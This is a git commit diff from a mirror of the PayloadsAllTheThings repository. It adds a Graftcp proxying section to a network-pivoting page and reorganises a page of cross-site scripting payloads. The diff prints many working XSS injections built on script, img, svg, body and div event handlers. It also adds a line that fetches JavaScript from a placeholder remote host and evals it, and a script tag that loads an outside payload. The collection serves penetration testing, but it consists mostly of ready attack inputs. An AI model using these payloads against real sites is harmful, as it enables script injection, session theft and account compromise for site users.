mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
XSS summary subentries + GraphTCP
This commit is contained in:
parent
94f6e31905
commit
dd40ddd233
@ -8,6 +8,7 @@
|
|||||||
* [Local Port Forwarding](#local-port-forwarding)
|
* [Local Port Forwarding](#local-port-forwarding)
|
||||||
* [Remote Port Forwarding](#remote-port-forwarding)
|
* [Remote Port Forwarding](#remote-port-forwarding)
|
||||||
* [Proxychains](#proxychains)
|
* [Proxychains](#proxychains)
|
||||||
|
* [Graphtcp](#graphtcp)
|
||||||
* [Web SOCKS - reGeorg](#web-socks---regeorg)
|
* [Web SOCKS - reGeorg](#web-socks---regeorg)
|
||||||
* [Metasploit](#metasploit)
|
* [Metasploit](#metasploit)
|
||||||
* [sshuttle](#sshuttle)
|
* [sshuttle](#sshuttle)
|
||||||
@ -80,6 +81,17 @@ socks4 localhost 8080
|
|||||||
|
|
||||||
Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
|
Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
|
||||||
|
|
||||||
|
## Graphtcp
|
||||||
|
|
||||||
|
Same as proxychains, with another mechanism to "proxify" which allow Go applications.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone https://github.com/hmgle/graftcp.git
|
||||||
|
cd graftcp && make
|
||||||
|
graftcp-local/graftcp-local
|
||||||
|
./graftcp chromium-browser
|
||||||
|
```
|
||||||
|
|
||||||
## Web SOCKS - reGeorg
|
## Web SOCKS - reGeorg
|
||||||
|
|
||||||
[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
|
[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
|
||||||
|
BIN
SQL Injection/Images/Unicode_SQL_injection.png
Normal file
BIN
SQL Injection/Images/Unicode_SQL_injection.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 517 KiB |
@ -11,6 +11,12 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
|||||||
- [Other ways](#other-ways)
|
- [Other ways](#other-ways)
|
||||||
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
|
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
|
||||||
- [XSS in HTML/Applications](#xss-in-htmlapplications)
|
- [XSS in HTML/Applications](#xss-in-htmlapplications)
|
||||||
|
- [Common Payloads](#common-payloads)
|
||||||
|
- [XSS using HTML5 tags](#xss-using-html5-tags)
|
||||||
|
- [XSS using a remote JS](#xss-using-a-remote-js)
|
||||||
|
- [XSS in hidden input](#xss-in-hidden-input)
|
||||||
|
- [DOM based XSS](#dom-based-xss)
|
||||||
|
- [XSS in JS Context](#xss-in-js-context)
|
||||||
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
|
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
|
||||||
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
|
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
|
||||||
- [XSS in PostMessage](#xss-in-postmessage)
|
- [XSS in PostMessage](#xss-in-postmessage)
|
||||||
@ -119,16 +125,16 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all]
|
|||||||
|
|
||||||
## XSS in HTML/Applications
|
## XSS in HTML/Applications
|
||||||
|
|
||||||
XSS Basic
|
### Common Payloads
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
Basic payload
|
// Basic payload
|
||||||
<script>alert('XSS')</script>
|
<script>alert('XSS')</script>
|
||||||
<scr<script>ipt>alert('XSS')</scr<script>ipt>
|
<scr<script>ipt>alert('XSS')</scr<script>ipt>
|
||||||
"><script>alert('XSS')</script>
|
"><script>alert('XSS')</script>
|
||||||
"><script>alert(String.fromCharCode(88,83,83))</script>
|
"><script>alert(String.fromCharCode(88,83,83))</script>
|
||||||
|
|
||||||
Img payload
|
// Img payload
|
||||||
<img src=x onerror=alert('XSS');>
|
<img src=x onerror=alert('XSS');>
|
||||||
<img src=x onerror=alert('XSS')//
|
<img src=x onerror=alert('XSS')//
|
||||||
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
||||||
@ -137,7 +143,7 @@ Img payload
|
|||||||
"><img src=x onerror=alert('XSS');>
|
"><img src=x onerror=alert('XSS');>
|
||||||
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
||||||
|
|
||||||
Svg payload
|
// Svg payload
|
||||||
<svgonload=alert(1)>
|
<svgonload=alert(1)>
|
||||||
<svg/onload=alert('XSS')>
|
<svg/onload=alert('XSS')>
|
||||||
<svg onload=alert(1)//
|
<svg onload=alert(1)//
|
||||||
@ -147,7 +153,7 @@ Svg payload
|
|||||||
"><svg/onload=alert(/XSS/)
|
"><svg/onload=alert(/XSS/)
|
||||||
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
|
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
|
||||||
|
|
||||||
Div payload
|
// Div payload
|
||||||
<div onpointerover="alert(45)">MOVE HERE</div>
|
<div onpointerover="alert(45)">MOVE HERE</div>
|
||||||
<div onpointerdown="alert(45)">MOVE HERE</div>
|
<div onpointerdown="alert(45)">MOVE HERE</div>
|
||||||
<div onpointerenter="alert(45)">MOVE HERE</div>
|
<div onpointerenter="alert(45)">MOVE HERE</div>
|
||||||
@ -157,7 +163,7 @@ Div payload
|
|||||||
<div onpointerup="alert(45)">MOVE HERE</div>
|
<div onpointerup="alert(45)">MOVE HERE</div>
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS for HTML5
|
### XSS using HTML5 tags
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<body onload=alert(/XSS/.source)>
|
<body onload=alert(/XSS/.source)>
|
||||||
@ -178,40 +184,36 @@ XSS for HTML5
|
|||||||
<body ontouchmove=alert(1)> // When a finger is dragged across the screen.
|
<body ontouchmove=alert(1)> // When a finger is dragged across the screen.
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS using script tag (external payload)
|
### XSS using a remote JS
|
||||||
|
|
||||||
```javascript
|
```html
|
||||||
|
<svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'>
|
||||||
<script src=14.rs>
|
<script src=14.rs>
|
||||||
you can also specify an arbitratry payload with 14.rs/#payload
|
// you can also specify an arbitrary payload with 14.rs/#payload
|
||||||
e.g: 14.rs/#alert(document.domain)
|
e.g: 14.rs/#alert(document.domain)
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS in Hidden input
|
### XSS in hidden input
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<input type="hidden" accesskey="X" onclick="alert(1)">
|
<input type="hidden" accesskey="X" onclick="alert(1)">
|
||||||
Use CTRL+SHIFT+X to trigger the onclick event
|
Use CTRL+SHIFT+X to trigger the onclick event
|
||||||
```
|
```
|
||||||
|
|
||||||
DOM XSS
|
### DOM based XSS
|
||||||
|
|
||||||
|
Based on a DOM XSS sink.
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
#"><img src=/ onerror=alert(2)>
|
#"><img src=/ onerror=alert(2)>
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
|
### XSS in JS Context
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
-(confirm)(document.domain)//
|
-(confirm)(document.domain)//
|
||||||
; alert(1);//
|
; alert(1);//
|
||||||
```
|
// (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
|
||||||
|
|
||||||
XSS URL
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
URL/<svg onload=alert(1)>
|
|
||||||
URL/<script>alert('XSS');//
|
|
||||||
URL/<input autofocus onfocus=alert(1)>
|
|
||||||
```
|
```
|
||||||
|
|
||||||
## XSS in wrappers javascript and data URI
|
## XSS in wrappers javascript and data URI
|
||||||
|
Loading…
Reference in New Issue
Block a user